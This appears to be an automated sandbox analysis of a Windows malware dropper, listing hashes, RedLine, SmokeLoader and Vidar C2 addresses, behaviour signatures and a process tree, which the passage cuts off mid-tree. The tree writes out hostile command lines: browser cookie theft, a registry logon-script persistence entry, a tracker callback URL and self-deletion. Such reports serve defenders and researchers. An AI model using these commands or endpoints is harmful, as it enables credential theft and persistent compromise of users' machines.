Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    530s
  • max time network
    1804s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 07:49

General

  • Target

    Setup (17).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 10 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 13 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 23 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 28 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 45 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1096
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2852
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
            PID:2756
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2608
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
                PID:2576
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1908
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1428
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1376
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1180
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:68
                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          2⤵
                            PID:7596
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                          1⤵
                            PID:340
                          • C:\Users\Admin\AppData\Local\Temp\Setup (17).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (17).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:800
                            • C:\Users\Admin\Documents\KrN7bo24TS8WeU6Pk37u7loY.exe
                              "C:\Users\Admin\Documents\KrN7bo24TS8WeU6Pk37u7loY.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2244
                            • C:\Users\Admin\Documents\iUlSYWTdKCmSIy1nrtLWPfhn.exe
                              "C:\Users\Admin\Documents\iUlSYWTdKCmSIy1nrtLWPfhn.exe"
                              2⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:2260
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 760
                                3⤵
                                • Program crash
                                PID:1336
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 784
                                3⤵
                                • Program crash
                                PID:3804
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 812
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:380
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 824
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4376
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 952
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4260
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 984
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:188
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 924
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:3184
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1428
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:744
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1464
                                3⤵
                                • Program crash
                                PID:5616
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1372
                                3⤵
                                • Program crash
                                PID:6136
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1644
                                3⤵
                                • Program crash
                                PID:5816
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1368
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                PID:4608
                            • C:\Users\Admin\Documents\gcR2Ihu81sA8cU13AYr_1qaV.exe
                              "C:\Users\Admin\Documents\gcR2Ihu81sA8cU13AYr_1qaV.exe"
                              2⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2284
                            • C:\Users\Admin\Documents\9jQ6OECke5LNCbyGfzcR797f.exe
                              "C:\Users\Admin\Documents\9jQ6OECke5LNCbyGfzcR797f.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3184
                              • C:\Users\Admin\Documents\9jQ6OECke5LNCbyGfzcR797f.exe
                                C:\Users\Admin\Documents\9jQ6OECke5LNCbyGfzcR797f.exe
                                3⤵
                                • Executes dropped EXE
                                PID:4508
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4508 -s 24
                                  4⤵
                                  • Program crash
                                  PID:4924
                            • C:\Users\Admin\Documents\avGZUSxvJaj8XpoInBK2W69I.exe
                              "C:\Users\Admin\Documents\avGZUSxvJaj8XpoInBK2W69I.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3492
                              • C:\Users\Admin\Documents\avGZUSxvJaj8XpoInBK2W69I.exe
                                "C:\Users\Admin\Documents\avGZUSxvJaj8XpoInBK2W69I.exe" -q
                                3⤵
                                • Executes dropped EXE
                                PID:4452
                            • C:\Users\Admin\Documents\jdi7zG9RYH1VttU9KE03ssO1.exe
                              "C:\Users\Admin\Documents\jdi7zG9RYH1VttU9KE03ssO1.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2560
                            • C:\Users\Admin\Documents\OBqArLfVs8SjDjWTccl9RQNT.exe
                              "C:\Users\Admin\Documents\OBqArLfVs8SjDjWTccl9RQNT.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3696
                              • C:\Users\Admin\AppData\Roaming\5431906.exe
                                "C:\Users\Admin\AppData\Roaming\5431906.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4796
                              • C:\Users\Admin\AppData\Roaming\7970584.exe
                                "C:\Users\Admin\AppData\Roaming\7970584.exe"
                                3⤵
                                • Executes dropped EXE
                                • Adds Run key to start application
                                PID:4104
                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  PID:1352
                            • C:\Users\Admin\Documents\lanFhRYJl525UtexT9t6TT1n.exe
                              "C:\Users\Admin\Documents\lanFhRYJl525UtexT9t6TT1n.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3168
                            • C:\Users\Admin\Documents\N8JMXHdHXTIB5xXQm2uJO_XP.exe
                              "C:\Users\Admin\Documents\N8JMXHdHXTIB5xXQm2uJO_XP.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:1924
                            • C:\Users\Admin\Documents\X7Du9MWk27Of6RIvmYqmnVPu.exe
                              "C:\Users\Admin\Documents\X7Du9MWk27Of6RIvmYqmnVPu.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2184
                            • C:\Users\Admin\Documents\mqlscRzZ6hZU074CcdF7n1_c.exe
                              "C:\Users\Admin\Documents\mqlscRzZ6hZU074CcdF7n1_c.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:4084
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 660
                                3⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4940
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 676
                                3⤵
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4348
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 684
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4592
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 736
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4256
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 1160
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Program crash
                                PID:3708
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 1060
                                3⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3680
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 1120
                                3⤵
                                • Program crash
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4748
                            • C:\Users\Admin\Documents\MxBAbQJLCMCDF9LXWCX2Ttzz.exe
                              "C:\Users\Admin\Documents\MxBAbQJLCMCDF9LXWCX2Ttzz.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:3928
                              • C:\Users\Admin\Documents\MxBAbQJLCMCDF9LXWCX2Ttzz.exe
                                "C:\Users\Admin\Documents\MxBAbQJLCMCDF9LXWCX2Ttzz.exe"
                                3⤵
                                  PID:2476
                              • C:\Users\Admin\Documents\oI5ROtal1eWwB66YpS9qXDTE.exe
                                "C:\Users\Admin\Documents\oI5ROtal1eWwB66YpS9qXDTE.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:3384
                                • C:\Users\Admin\Documents\oI5ROtal1eWwB66YpS9qXDTE.exe
                                  C:\Users\Admin\Documents\oI5ROtal1eWwB66YpS9qXDTE.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4528
                              • C:\Users\Admin\Documents\AxDBD9IRDLKUf7onYqk7zt1b.exe
                                "C:\Users\Admin\Documents\AxDBD9IRDLKUf7onYqk7zt1b.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:4040
                                • C:\Users\Admin\Documents\AxDBD9IRDLKUf7onYqk7zt1b.exe
                                  C:\Users\Admin\Documents\AxDBD9IRDLKUf7onYqk7zt1b.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4464
                              • C:\Users\Admin\Documents\6CmIT5a8N3GJR0vwSazEtLU0.exe
                                "C:\Users\Admin\Documents\6CmIT5a8N3GJR0vwSazEtLU0.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks SCSI registry key(s)
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: MapViewOfSection
                                PID:3020
                              • C:\Users\Admin\Documents\dAPUjnPB89FOViFodNT_LHWK.exe
                                "C:\Users\Admin\Documents\dAPUjnPB89FOViFodNT_LHWK.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2224
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 664
                                  3⤵
                                  • Program crash
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4932
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 716
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4352
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 740
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1496
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 792
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4152
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 888
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1068
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 1120
                                  3⤵
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3780
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 1112
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5064
                              • C:\Users\Admin\Documents\gN3bP_9wWnRyFwJ9fQfJdwbb.exe
                                "C:\Users\Admin\Documents\gN3bP_9wWnRyFwJ9fQfJdwbb.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1556
                              • C:\Users\Admin\Documents\8D1qgc3TMHEFr7NZqdfOPhlh.exe
                                "C:\Users\Admin\Documents\8D1qgc3TMHEFr7NZqdfOPhlh.exe"
                                2⤵
                                  PID:3708
                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5108
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                      • Executes dropped EXE
                                      PID:4976
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      4⤵
                                        PID:3184
                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:2132
                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:1784
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                        • Executes dropped EXE
                                        PID:3148
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                        • Executes dropped EXE
                                        PID:5512
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                        • Executes dropped EXE
                                        PID:5964
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        4⤵
                                        • Executes dropped EXE
                                        PID:4556
                                      • C:\Windows\system32\WerFault.exe
                                        C:\Windows\system32\WerFault.exe -u -p 1784 -s 1520
                                        4⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        PID:4600
                                  • C:\Users\Admin\Documents\uMZYxsPbdZ1xK4R5K9tvFFek.exe
                                    "C:\Users\Admin\Documents\uMZYxsPbdZ1xK4R5K9tvFFek.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Checks BIOS information in registry
                                    • Checks whether UAC is enabled
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4020
                                  • C:\Users\Admin\Documents\GqEko_LrZZNpd1gwRJK_4v4Q.exe
                                    "C:\Users\Admin\Documents\GqEko_LrZZNpd1gwRJK_4v4Q.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:4708
                                    • C:\Users\Admin\AppData\Local\Temp\is-13FCR.tmp\GqEko_LrZZNpd1gwRJK_4v4Q.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-13FCR.tmp\GqEko_LrZZNpd1gwRJK_4v4Q.tmp" /SL5="$40086,138429,56832,C:\Users\Admin\Documents\GqEko_LrZZNpd1gwRJK_4v4Q.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of FindShellTrayWindow
                                      PID:4988
                                      • C:\Users\Admin\AppData\Local\Temp\is-5QDU8.tmp\Setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-5QDU8.tmp\Setup.exe" /Verysilent
                                        4⤵
                                        • Executes dropped EXE
                                        • Drops file in Program Files directory
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3804
                                        • C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
                                          "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:2176
                                        • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                          "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                          5⤵
                                          • Executes dropped EXE
                                          PID:5140
                                          • C:\Users\Admin\AppData\Local\Temp\is-QNEU5.tmp\Inlog.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-QNEU5.tmp\Inlog.tmp" /SL5="$102D2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious use of FindShellTrayWindow
                                            PID:5392
                                            • C:\Users\Admin\AppData\Local\Temp\is-CFBB0.tmp\Setup.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-CFBB0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                              7⤵
                                              • Executes dropped EXE
                                              PID:6564
                                              • C:\Users\Admin\AppData\Local\Temp\is-LA8S6.tmp\Setup.tmp
                                                "C:\Users\Admin\AppData\Local\Temp\is-LA8S6.tmp\Setup.tmp" /SL5="$20490,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-CFBB0.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                8⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in Program Files directory
                                                • Suspicious use of FindShellTrayWindow
                                                PID:6784
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-KMIPH.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                  9⤵
                                                    PID:6936
                                                    • C:\Windows\SysWOW64\expand.exe
                                                      expand C:\Users\Admin\AppData\Local\Temp\is-KMIPH.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                      10⤵
                                                      • Drops file in Windows directory
                                                      PID:7540
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                    9⤵
                                                      PID:4876
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                        10⤵
                                                          PID:8960
                                                      • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                        9⤵
                                                        • Loads dropped DLL
                                                        PID:9200
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                        9⤵
                                                        • Checks computer location settings
                                                        PID:8904
                                                      • C:\Users\Admin\AppData\Local\Temp\is-KMIPH.tmp\{app}\vdi_compiler.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-KMIPH.tmp\{app}\vdi_compiler"
                                                        9⤵
                                                          PID:1664
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-KMIPH.tmp\{app}\vdi_compiler.exe"
                                                            10⤵
                                                              PID:3852
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping localhost -n 4
                                                                11⤵
                                                                • Runs ping.exe
                                                                PID:9044
                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Enumerates connected drives
                                                    • Modifies system certificate store
                                                    • Suspicious use of FindShellTrayWindow
                                                    PID:5184
                                                    • C:\Windows\SysWOW64\msiexec.exe
